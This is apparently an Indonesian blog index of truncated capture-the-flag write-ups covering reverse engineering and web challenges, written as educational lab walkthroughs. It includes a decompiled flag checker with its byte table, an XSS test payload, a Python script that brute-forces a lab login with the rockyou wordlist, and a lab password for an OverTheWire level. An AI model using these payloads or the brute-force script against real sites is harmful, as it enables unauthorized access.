Challenge Description : Rick created another vicious program. Could you get the correct flag? MsgMeThis.exe Diberikan sebuah file bernama MsgMeThis.exe, pertama-tama kita melakukan check terhadap tipe file nyakemudian, kita bisa mencoba untuk mencari strings di dalam file tersebut menggunakan fungsi strings. Untuk memudahkan, kita bisa menggunakan egrep untuk mengeluarkan string dengan kata kunci tertentu seperti […]
[BCACTF19] – basic-pass-1
Challenge Description : Your company is testing out a new login software, and being one of the CompSec experts, they want you to test it. They say that they have hidden a key somewhere in the program, and want you to look for it. Find it, and they might even consider giving you a pay […]
[Cyber Jawara 2019 Qualification] – Haseul
Kita di berikan sebuah file ELF 64bit yang dapat kalian download disini Kita coba buka file tersebut dengan IDA Pro 64bit
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
signed __int64 __fastcall main(int a1, char **a2, char **a3) { int v4; // eax int v5; // [rsp+1Ch] [rbp-14h] signed int i; // [rsp+20h] [rbp-10h] signed int j; // [rsp+24h] [rbp-Ch] char *s; // [rsp+28h] [rbp-8h] if ( a1 != 2 ) return 1LL; s = a2[1]; if ( strlen(a2[1]) != 34 ) return 1LL; v5 = 0; for ( i = 0; i < 33; ++i ) { for ( j = 1; j < 34; ++j ) { v4 = v5++; if ( s[i] + s[j] != byte_8A0[v4] ) { puts("nope!"); return 1LL; } } } printf("CJ2019{%s}\n", s, a2); return 0LL; } |
Dari algoritma diatas, string tersebut dibandingkan dengan sesuatu yang ada di dalam byte_8A0
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
.rodata:00000000000008A0 byte_8A0 db 0A9h, 0EEh, 0D8h, 0DCh, 0DAh, 0E7h, 0D8h, 0ECh, 0A9h .rodata:00000000000008A0 ; DATA XREF: main+9E↑o .rodata:00000000000008A0 db 0E5h, 0EFh, 0DEh, 0D8h, 0EDh, 0E1h, 0E2h, 0AEh, 0D8h .rodata:00000000000008A0 db 0DEh, 0DAh, 0AEh, 0E2h, 0E5h, 0F2h, 0D8h, 0EEh, 0ECh .rodata:00000000000008A0 db 0E2h, 0E7h, 0B2h, 0D8h, 0D3h, 0ACh, 60h, 0A5h, 8Fh .rodata:00000000000008A0 db 93h, 91h, 9Eh, 8Fh, 0A3h, 60h, 9Ch, 0A6h, 95h, 8Fh .rodata:00000000000008A0 db 0A4h, 98h, 99h, 65h, 8Fh, 95h, 91h, 65h, 99h, 9Ch, 0A9h .rodata:00000000000008A0 db 8Fh, 0A5h, 0A3h, 99h, 9Eh, 69h, 8Fh, 8Ah, 63h, 0A5h .rodata:00000000000008A0 db 0EAh, 0D4h, 0D8h, 0D6h, 0E3h, 0D4h, 0E8h, 0A5h, 0E1h .rodata:00000000000008A0 db 0EBh, 0DAh, 0D4h, 0E9h, 0DDh, 0DEh, 0AAh, 0D4h, 0DAh .rodata:00000000000008A0 db 0D6h, 0AAh, 0DEh, 0E1h, 0EEh, 0D4h, 0EAh, 0E8h, 0DEh .rodata:00000000000008A0 db 0E3h, 0AEh, 0D4h, 0CFh, 0A8h, 8Fh, 0D4h, 0BEh, 0C2h .rodata:00000000000008A0 db 0C0h, 0CDh, 0BEh, 0D2h, 8Fh, 0CBh, 0D5h, 0C4h, 0BEh .rodata:00000000000008A0 db 0D3h, 0C7h, 0C8h, 94h, 0BEh, 0C4h, 0C0h, 94h, 0C8h .rodata:00000000000008A0 db 0CBh, 0D8h, 0BEh, 0D4h, 0D2h, 0C8h, 0CDh, 98h, 0BEh .rodata:00000000000008A0 db 0B9h, 92h, 93h, 0D8h, 0C2h, 0C6h, 0C4h, 0D1h, 0C2h .rodata:00000000000008A0 db 0D6h, 93h, 0CFh, 0D9h, 0C8h, 0C2h, 0D7h, 0CBh, 0CCh .rodata:00000000000008A0 db 98h, 0C2h, 0C8h, 0C4h, 98h, 0CCh, 0CFh, 0DCh, 0C2h .rodata:00000000000008A0 db 0D8h, 0D6h, 0CCh, 0D1h, 9Ch, 0C2h, 0BDh, 96h, 91h, 0D6h .rodata:00000000000008A0 db 0C0h, 0C4h, 0C2h, 0CFh, 0C0h, 0D4h, 91h, 0CDh, 0D7h .rodata:00000000000008A0 db 0C6h, 0C0h, 0D5h, 0C9h, 0CAh, 96h, 0C0h, 0C6h, 0C2h .rodata:00000000000008A0 db 96h, 0CAh, 0CDh, 0DAh, 0C0h, 0D6h, 0D4h, 0CAh, 0CFh .rodata:00000000000008A0 db 9Ah, 0C0h, 0BBh, 94h, 9Eh, 0E3h, 0CDh, 0D1h, 0CFh, 0DCh .rodata:00000000000008A0 db 0CDh, 0E1h, 9Eh, 0DAh, 0E4h, 0D3h, 0CDh, 0E2h, 0D6h .rodata:00000000000008A0 db 0D7h, 0A3h, 0CDh, 0D3h, 0CFh, 0A3h, 0D7h, 0DAh, 0E7h .rodata:00000000000008A0 db 0CDh, 0E3h, 0E1h, 0D7h, 0DCh, 0A7h, 0CDh, 0C8h, 0A1h .rodata:00000000000008A0 db 8Fh, 0D4h, 0BEh, 0C2h, 0C0h, 0CDh, 0BEh, 0D2h, 8Fh .rodata:00000000000008A0 db 0CBh, 0D5h, 0C4h, 0BEh, 0D3h, 0C7h, 0C8h, 94h, 0BEh .rodata:00000000000008A0 db 0C4h, 0C0h, 94h, 0C8h, 0CBh, 0D8h, 0BEh, 0D4h, 0D2h .rodata:00000000000008A0 db 0C8h, 0CDh, 98h, 0BEh, 0B9h, 92h, 0A3h, 0E8h, 0D2h .rodata:00000000000008A0 db 0D6h, 0D4h, 0E1h, 0D2h, 0E6h, 0A3h, 0DFh, 0E9h, 0D8h .rodata:00000000000008A0 db 0D2h, 0E7h, 0DBh, 0DCh, 0A8h, 0D2h, 0D8h, 0D4h, 0A8h .rodata:00000000000008A0 db 0DCh, 0DFh, 0ECh, 0D2h, 0E8h, 0E6h, 0DCh, 0E1h, 0ACh .rodata:00000000000008A0 db 0D2h, 0CDh, 0A6h, 60h, 0A5h, 8Fh, 93h, 91h, 9Eh, 8Fh .rodata:00000000000008A0 db 0A3h, 60h, 9Ch, 0A6h, 95h, 8Fh, 0A4h, 98h, 99h, 65h .rodata:00000000000008A0 db 8Fh, 95h, 91h, 65h, 99h, 9Ch, 0A9h, 8Fh, 0A5h, 0A3h .rodata:00000000000008A0 db 99h, 9Eh, 69h, 8Fh, 8Ah, 63h, 9Ch, 0E1h, 0CBh, 0CFh .rodata:00000000000008A0 db 0CDh, 0DAh, 0CBh, 0DFh, 9Ch, 0D8h, 0E2h, 0D1h, 0CBh .rodata:00000000000008A0 db 0E0h, 0D4h, 0D5h, 0A1h, 0CBh, 0D1h, 0CDh, 0A1h, 0D5h .rodata:00000000000008A0 db 0D8h, 0E5h, 0CBh, 0E1h, 0DFh, 0D5h, 0DAh, 0A5h, 0CBh .rodata:00000000000008A0 db 0C6h, 9Fh, 0A6h, 0EBh, 0D5h, 0D9h, 0D7h, 0E4h, 0D5h .rodata:00000000000008A0 db 0E9h, 0A6h, 0E2h, 0ECh, 0DBh, 0D5h, 0EAh, 0DEh, 0DFh .rodata:00000000000008A0 db 0ABh, 0D5h, 0DBh, 0D7h, 0ABh, 0DFh, 0E2h, 0EFh, 0D5h .rodata:00000000000008A0 db 0EBh, 0E9h, 0DFh, 0E4h, 0AFh, 0D5h, 0D0h, 0A9h, 95h .rodata:00000000000008A0 db 0DAh, 0C4h, 0C8h, 0C6h, 0D3h, 0C4h, 0D8h, 95h, 0D1h .rodata:00000000000008A0 db 0DBh, 0CAh, 0C4h, 0D9h, 0CDh, 0CEh, 9Ah, 0C4h, 0CAh .rodata:00000000000008A0 db 0C6h, 9Ah, 0CEh, 0D1h, 0DEh, 0C4h, 0DAh, 0D8h, 0CEh .rodata:00000000000008A0 db 0D3h, 9Eh, 0C4h, 0BFh, 98h, 8Fh, 0D4h, 0BEh, 0C2h, 0C0h .rodata:00000000000008A0 db 0CDh, 0BEh, 0D2h, 8Fh, 0CBh, 0D5h, 0C4h, 0BEh, 0D3h .rodata:00000000000008A0 db 0C7h, 0C8h, 94h, 0BEh, 0C4h, 0C0h, 94h, 0C8h, 0CBh .rodata:00000000000008A0 db 0D8h, 0BEh, 0D4h, 0D2h, 0C8h, 0CDh, 98h, 0BEh, 0B9h .rodata:00000000000008A0 db 92h, 0A4h, 0E9h, 0D3h, 0D7h, 0D5h, 0E2h, 0D3h, 0E7h .rodata:00000000000008A0 db 0A4h, 0E0h, 0EAh, 0D9h, 0D3h, 0E8h, 0DCh, 0DDh, 0A9h .rodata:00000000000008A0 db 0D3h, 0D9h, 0D5h, 0A9h, 0DDh, 0E0h, 0EDh, 0D3h, 0E9h .rodata:00000000000008A0 db 0E7h, 0DDh, 0E2h, 0ADh, 0D3h, 0CEh, 0A7h, 98h, 0DDh .rodata:00000000000008A0 db 0C7h, 0CBh, 0C9h, 0D6h, 0C7h, 0DBh, 98h, 0D4h, 0DEh .rodata:00000000000008A0 db 0CDh, 0C7h, 0DCh, 0D0h, 0D1h, 9Dh, 0C7h, 0CDh, 0C9h .rodata:00000000000008A0 db 9Dh, 0D1h, 0D4h, 0E1h, 0C7h, 0DDh, 0DBh, 0D1h, 0D6h .rodata:00000000000008A0 db 0A1h, 0C7h, 0C2h, 9Bh, 99h, 0DEh, 0C8h, 0CCh, 0CAh .rodata:00000000000008A0 db 0D7h, 0C8h, 0DCh, 99h, 0D5h, 0DFh, 0CEh, 0C8h, 0DDh .rodata:00000000000008A0 db 0D1h, 0D2h, 9Eh, 0C8h, 0CEh, 0CAh, 9Eh, 0D2h, 0D5h .rodata:00000000000008A0 db 0E2h, 0C8h, 0DEh, 0DCh, 0D2h, 0D7h, 0A2h, 0C8h, 0C3h .rodata:00000000000008A0 db 9Ch, 65h, 0AAh, 94h, 98h, 96h, 0A3h, 94h, 0A8h, 65h .rodata:00000000000008A0 db 0A1h, 0ABh, 9Ah, 94h, 0A9h, 9Dh, 9Eh, 6Ah, 94h, 9Ah .rodata:00000000000008A0 db 96h, 6Ah, 9Eh, 0A1h, 0AEh, 94h, 0AAh, 0A8h, 9Eh, 0A3h .rodata:00000000000008A0 db 6Eh, 94h, 8Fh, 68h, 8Fh, 0D4h, 0BEh, 0C2h, 0C0h, 0CDh .rodata:00000000000008A0 db 0BEh, 0D2h, 8Fh, 0CBh, 0D5h, 0C4h, 0BEh, 0D3h, 0C7h .rodata:00000000000008A0 db 0C8h, 94h, 0BEh, 0C4h, 0C0h, 94h, 0C8h, 0CBh, 0D8h .rodata:00000000000008A0 db 0BEh, 0D4h, 0D2h, 0C8h, 0CDh, 98h, 0BEh, 0B9h, 92h .rodata:00000000000008A0 db 95h, 0DAh, 0C4h, 0C8h, 0C6h, 0D3h, 0C4h, 0D8h, 95h .rodata:00000000000008A0 db 0D1h, 0DBh, 0CAh, 0C4h, 0D9h, 0CDh, 0CEh, 9Ah, 0C4h .rodata:00000000000008A0 db 0CAh, 0C6h, 9Ah, 0CEh, 0D1h, 0DEh, 0C4h, 0DAh, 0D8h .rodata:00000000000008A0 db 0CEh, 0D3h, 9Eh, 0C4h, 0BFh, 98h, 91h, 0D6h, 0C0h, 0C4h .rodata:00000000000008A0 db 0C2h, 0CFh, 0C0h, 0D4h, 91h, 0CDh, 0D7h, 0C6h, 0C0h .rodata:00000000000008A0 db 0D5h, 0C9h, 0CAh, 96h, 0C0h, 0C6h, 0C2h, 96h, 0CAh .rodata:00000000000008A0 db 0CDh, 0DAh, 0C0h, 0D6h, 0D4h, 0CAh, 0CFh, 9Ah, 0C0h .rodata:00000000000008A0 db 0BBh, 94h, 65h, 0AAh, 94h, 98h, 96h, 0A3h, 94h, 0A8h .rodata:00000000000008A0 db 65h, 0A1h, 0ABh, 9Ah, 94h, 0A9h, 9Dh, 9Eh, 6Ah, 94h .rodata:00000000000008A0 db 9Ah, 96h, 6Ah, 9Eh, 0A1h, 0AEh, 94h, 0AAh, 0A8h, 9Eh .rodata:00000000000008A0 db 0A3h, 6Eh, 94h, 8Fh, 68h, 99h, 0DEh, 0C8h, 0CCh, 0CAh .rodata:00000000000008A0 db 0D7h, 0C8h, 0DCh, 99h, 0D5h, 0DFh, 0CEh, 0C8h, 0DDh .rodata:00000000000008A0 db 0D1h, 0D2h, 9Eh, 0C8h, 0CEh, 0CAh, 9Eh, 0D2h, 0D5h .rodata:00000000000008A0 db 0E2h, 0C8h, 0DEh, 0DCh, 0D2h, 0D7h, 0A2h, 0C8h, 0C3h .rodata:00000000000008A0 db 2 dup(9Ch), 0E1h, 0CBh, 0CFh, 0CDh, 0DAh, 0CBh, 0DFh .rodata:00000000000008A0 db 9Ch, 0D8h, 0E2h, 0D1h, 0CBh, 0E0h, 0D4h, 0D5h, 0A1h .rodata:00000000000008A0 db 0CBh, 0D1h, 0CDh, 0A1h, 0D5h, 0D8h, 0E5h, 0CBh, 0E1h .rodata:00000000000008A0 db 0DFh, 0D5h, 0DAh, 0A5h, 0CBh, 0C6h, 9Fh, 0A9h, 0EEh .rodata:00000000000008A0 db 0D8h, 0DCh, 0DAh, 0E7h, 0D8h, 0ECh, 0A9h, 0E5h, 0EFh .rodata:00000000000008A0 db 0DEh, 0D8h, 0EDh, 0E1h, 0E2h, 0AEh, 0D8h, 0DEh, 0DAh .rodata:00000000000008A0 db 0AEh, 0E2h, 0E5h, 0F2h, 0D8h, 0EEh, 0ECh, 0E2h, 0E7h .rodata:00000000000008A0 db 0B2h, 0D8h, 0D3h, 0ACh, 8Fh, 0D4h, 0BEh, 0C2h, 0C0h .rodata:00000000000008A0 db 0CDh, 0BEh, 0D2h, 8Fh, 0CBh, 0D5h, 0C4h, 0BEh, 0D3h .rodata:00000000000008A0 db 0C7h, 0C8h, 94h, 0BEh, 0C4h, 0C0h, 94h, 0C8h, 0CBh .rodata:00000000000008A0 db 0D8h, 0BEh, 0D4h, 0D2h, 0C8h, 0CDh, 98h, 0BEh, 0B9h .rodata:00000000000008A0 db 92h, 0A5h, 0EAh, 0D4h, 0D8h, 0D6h, 0E3h, 0D4h, 0E8h .rodata:00000000000008A0 db 0A5h, 0E1h, 0EBh, 0DAh, 0D4h, 0E9h, 0DDh, 0DEh, 0AAh .rodata:00000000000008A0 db 0D4h, 0DAh, 0D6h, 0AAh, 0DEh, 0E1h, 0EEh, 0D4h, 0EAh .rodata:00000000000008A0 db 0E8h, 0DEh, 0E3h, 0AEh, 0D4h, 0CFh, 0A8h, 0A3h, 0E8h .rodata:00000000000008A0 db 0D2h, 0D6h, 0D4h, 0E1h, 0D2h, 0E6h, 0A3h, 0DFh, 0E9h .rodata:00000000000008A0 db 0D8h, 0D2h, 0E7h, 0DBh, 0DCh, 0A8h, 0D2h, 0D8h, 0D4h .rodata:00000000000008A0 db 0A8h, 0DCh, 0DFh, 0ECh, 0D2h, 0E8h, 0E6h, 0DCh, 0E1h .rodata:00000000000008A0 db 0ACh, 0D2h, 0CDh, 0A6h, 99h, 0DEh, 0C8h, 0CCh, 0CAh .rodata:00000000000008A0 db 0D7h, 0C8h, 0DCh, 99h, 0D5h, 0DFh, 0CEh, 0C8h, 0DDh .rodata:00000000000008A0 db 0D1h, 0D2h, 9Eh, 0C8h, 0CEh, 0CAh, 9Eh, 0D2h, 0D5h .rodata:00000000000008A0 db 0E2h, 0C8h, 0DEh, 0DCh, 0D2h, 0D7h, 0A2h, 0C8h, 0C3h .rodata:00000000000008A0 db 9Ch, 9Eh, 0E3h, 0CDh, 0D1h, 0CFh, 0DCh, 0CDh, 0E1h .rodata:00000000000008A0 db 9Eh, 0DAh, 0E4h, 0D3h, 0CDh, 0E2h, 0D6h, 0D7h, 0A3h .rodata:00000000000008A0 db 0CDh, 0D3h, 0CFh, 0A3h, 0D7h, 0DAh, 0E7h, 0CDh, 0E3h .rodata:00000000000008A0 db 0E1h, 0D7h, 0DCh, 0A7h, 0CDh, 0C8h, 0A1h, 69h, 0AEh .rodata:00000000000008A0 db 98h, 9Ch, 9Ah, 0A7h, 98h, 0ACh, 69h, 0A5h, 0AFh, 9Eh .rodata:00000000000008A0 db 98h, 0ADh, 0A1h, 0A2h, 6Eh, 98h, 9Eh, 9Ah, 6Eh, 0A2h .rodata:00000000000008A0 db 0A5h, 0B2h, 98h, 0AEh, 0ACh, 0A2h, 0A7h, 72h, 98h, 93h .rodata:00000000000008A0 db 6Ch, 8Fh, 0D4h, 0BEh, 0C2h, 0C0h, 0CDh, 0BEh, 0D2h .rodata:00000000000008A0 db 8Fh, 0CBh, 0D5h, 0C4h, 0BEh, 0D3h, 0C7h, 0C8h, 94h .rodata:00000000000008A0 db 0BEh, 0C4h, 0C0h, 94h, 0C8h, 0CBh, 0D8h, 0BEh, 0D4h .rodata:00000000000008A0 db 0D2h, 0C8h, 0CDh, 98h, 0BEh, 0B9h, 92h, 8Ah, 0CFh, 0B9h .rodata:00000000000008A0 db 0BDh, 0BBh, 0C8h, 0B9h, 0CDh, 8Ah, 0C6h, 0D0h, 0BFh .rodata:00000000000008A0 db 0B9h, 0CEh, 0C2h, 0C3h, 8Fh, 0B9h, 0BFh, 0BBh, 8Fh .rodata:00000000000008A0 db 0C3h, 0C6h, 0D3h, 0B9h, 0CFh, 0CDh, 0C3h, 0C8h, 93h .rodata:00000000000008A0 db 0B9h, 0B4h, 8Dh |
Kemudian kita buat menjadi desimal yang menjadi
|
1 |
169,238,216,220,218,231,216,236,169,229,239,222,216,237,225,226,174,216,222,218,174,226,229,242,216,238,236,226,231,178,216,211,172,96,165,143,147,145,158,143,163,96,156,166,149,143,164,152,153,101,143,149,145,101,153,156,169,143,165,163,153,158,105,143,138,99,165,234,212,216,214,227,212,232,165,225,235,218,212,233,221,222,170,212,218,214,170,222,225,238,212,234,232,222,227,174,212,207,168,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,147,216,194,198,196,209,194,214,147,207,217,200,194,215,203,204,152,194,200,196,152,204,207,220,194,216,214,204,209,156,194,189,150,145,214,192,196,194,207,192,212,145,205,215,198,192,213,201,202,150,192,198,194,150,202,205,218,192,214,212,202,207,154,192,187,148,158,227,205,209,207,220,205,225,158,218,228,211,205,226,214,215,163,205,211,207,163,215,218,231,205,227,225,215,220,167,205,200,161,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,163,232,210,214,212,225,210,230,163,223,233,216,210,231,219,220,168,210,216,212,168,220,223,236,210,232,230,220,225,172,210,205,166,96,165,143,147,145,158,143,163,96,156,166,149,143,164,152,153,101,143,149,145,101,153,156,169,143,165,163,153,158,105,143,138,99,156,225,203,207,205,218,203,223,156,216,226,209,203,224,212,213,161,203,209,205,161,213,216,229,203,225,223,213,218,165,203,198,159,166,235,213,217,215,228,213,233,166,226,236,219,213,234,222,223,171,213,219,215,171,223,226,239,213,235,233,223,228,175,213,208,169,149,218,196,200,198,211,196,216,149,209,219,202,196,217,205,206,154,196,202,198,154,206,209,222,196,218,216,206,211,158,196,191,152,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,164,233,211,215,213,226,211,231,164,224,234,217,211,232,220,221,169,211,217,213,169,221,224,237,211,233,231,221,226,173,211,206,167,152,221,199,203,201,214,199,219,152,212,222,205,199,220,208,209,157,199,205,201,157,209,212,225,199,221,219,209,214,161,199,194,155,153,222,200,204,202,215,200,220,153,213,223,206,200,221,209,210,158,200,206,202,158,210,213,226,200,222,220,210,215,162,200,195,156,101,170,148,152,150,163,148,168,101,161,171,154,148,169,157,158,106,148,154,150,106,158,161,174,148,170,168,158,163,110,148,143,104,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,149,218,196,200,198,211,196,216,149,209,219,202,196,217,205,206,154,196,202,198,154,206,209,222,196,218,216,206,211,158,196,191,152,145,214,192,196,194,207,192,212,145,205,215,198,192,213,201,202,150,192,198,194,150,202,205,218,192,214,212,202,207,154,192,187,148,101,170,148,152,150,163,148,168,101,161,171,154,148,169,157,158,106,148,154,150,106,158,161,174,148,170,168,158,163,110,148,143,104,153,222,200,204,202,215,200,220,153,213,223,206,200,221,209,210,158,200,206,202,158,210,213,226,200,222,220,210,215,162,200,195,156,156,225,203,207,205,218,203,223,156,216,226,209,203,224,212,213,161,203,209,205,161,213,216,229,203,225,223,213,218,165,203,198,159,169,238,216,220,218,231,216,236,169,229,239,222,216,237,225,226,174,216,222,218,174,226,229,242,216,238,236,226,231,178,216,211,172,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,165,234,212,216,214,227,212,232,165,225,235,218,212,233,221,222,170,212,218,214,170,222,225,238,212,234,232,222,227,174,212,207,168,163,232,210,214,212,225,210,230,163,223,233,216,210,231,219,220,168,210,216,212,168,220,223,236,210,232,230,220,225,172,210,205,166,153,222,200,204,202,215,200,220,153,213,223,206,200,221,209,210,158,200,206,202,158,210,213,226,200,222,220,210,215,162,200,195,156,158,227,205,209,207,220,205,225,158,218,228,211,205,226,214,215,163,205,211,207,163,215,218,231,205,227,225,215,220,167,205,200,161,105,174,152,156,154,167,152,172,105,165,175,158,152,173,161,162,110,152,158,154,110,162,165,178,152,174,172,162,167,114,152,147,108,143,212,190,194,192,205,190,210,143,203,213,196,190,211,199,200,148,190,196,192,148,200,203,216,190,212,210,200,205,152,190,185,146,138,207,185,189,187,200,185,205,138,198,208,191,185,206,194,195,143,185,191,187,143,195,198,211,185,207,205,195,200,147,185,180,141 |
Dari main diatas dan isi dari byte_8A0, kita buat solvernya dengan menggunakan […]
[GoogleCTF 2018 BeginnersQuest] – gatekeeper
Karena ini levelnya beginner, Mari kita mempelajari static analysis-nya sebagai langkah awal yang baik dalam Reverse Engineering Soal ini dapat kalian download disini pertama tama, kita coba jalankan program tersebut terlebih dahulu
|
1 2 3 4 5 6 |
root@kali:~/Documents# ./gatekeeper /===========================================================================\ | Gatekeeper - Access your PC from everywhere! | +===========================================================================+ [ERROR] Login information missing Usage: ./gatekeeper <username> <password> |
dari error message yang didapatkan, ternyata program tersebut membutuhkan informasi lebih. Seperti yang di perlihatkan dalam pesan ” Usage: “, kita membutuhkan […]
[RingZer0] XSS Challenge 2
Diberi sebuah input box jika kita input sesuatu, dia akan memprint sesuatu itu Setelah saya meng-F12 page, tidak ada hidden input atau hal yang menarik lainnya. Jadi saya coba memasukkan html tag <img> payloadnya <img src=”” onerror=”javascript:alert(1)”> Muncul gambar invalid, setelah dicek ternyata symbol-symbol petik telah di escape dan petik-petik baru telah di tambahkan. Saya […]
[RingZer0] XSS Challenge 1
Diberi sebuah web dengan sebuah input box Setelah meng-F12 page ini, saya menemukan sebuah hidden input Maka saya coba input “asdasd” di input box, dan ternyata input tersebut muncul di element <embed> sebagai atribut “src” Saya pikir ini mirip dengan XSS melalui element <img> karena juga memasukkan payload di atribut “src”. Saya juga melihat ada […]
[HackTheBox – CTF] – Emdee five for life
Pada soal kali ini kita diberikan website dengan 1 text box dan kita diberikan intruksi bahwa kita diminta untuk menencrypt suatu string menjadi MD5. So let’s do just that. Saat kita memasukan MD5 nya, kita dapat response “Too slow!”. Let’s try some scripting.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
import requests import hashlib import re url = "http://docker.hackthebox.eu:40113" r = requests.session() response = r.get(url).text word = re.findall(r"(?:<h3 align='center'>)(.+)(?:</h3)", response)[0] encrypted = hashlib.md5(word.encode()).hexdigest() response = r.post(url, data={"hash" : encrypted}).text print re.findall(r"HTB\{.+\}",response)[0] |
Dengan ini kita dapat mengambil string dalam website tersebut dan langsung […]
[Overthewire] – Natas6,7,8
http://natas6.natas.labs.overthewire.org/ username : natas6 password : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 Tampilan pertama halaman web adalah seperti dibawah ini Terdapat sebuah field untuk memasukkan input dan link untuk menuju source codenya di http://natas6.natas.labs.overthewire.org/index-source.html
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
<html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head> <body> <h1>natas6</h1> <div id="content"> <? include "includes/secret.inc"; if(array_key_exists("submit", $_POST)) { if($secret == $_POST['secret']) { print "Access granted. The password for natas7 is <censored>"; } else { print "Wrong secret"; } } ?> <form method=post> Input secret: <input name=secret><br> <input type=submit name=submit> </form> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div> </div> </body> </html> |
Ditengah terdapat sebuah code php yang akan saya jelaskan, pertama codenya melakukan include sebuah file di folder includes bernama secret.inc , kemudian melakukan pengecekan jika input sudah […]
[HackTheBox – CTF] – Lernaean
Di challenge kali ini kita diberikan website dengan 1 textbox, bila kita masukan hal random diberikan response “Invalid password!”. Dan bila kita mencoba basic SQL injection tidak memberikan hal baru apapun. Karena dibilang “do not try to guess my password”, so I thought let’s try some bruteforce.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
import requests url = "http://docker.hackthebox.eu:39511/" file = open("rockyou.txt", "r") for line in file: line = line.split('\n')[0] params = {"_ga" : "GA1.2.987465826.1566441808", "_gid" : "GA1.2.1734517775.1566965361", "password" : line} response = requests.post(url, data=params) print line if "Invalid password!" not in response.text: print "passoword found! = " + line break |
Script ini sederhana hanya mencoba semua line […]
[Root-Me] – SQL injection – String
Challenge Description: Diberikan sebuah web service dengan beberapa fitur ( Home, Search, Login ) Dari judul soal kita sudah dapat mengetahui ini adalah soal sql injection, salah satu celah yang dapat digunakan adalah user input. Pada web service tersebut ada 2 user input pada page search dan login. Setelah beberapa saat mencari dimana titik celahnya, […]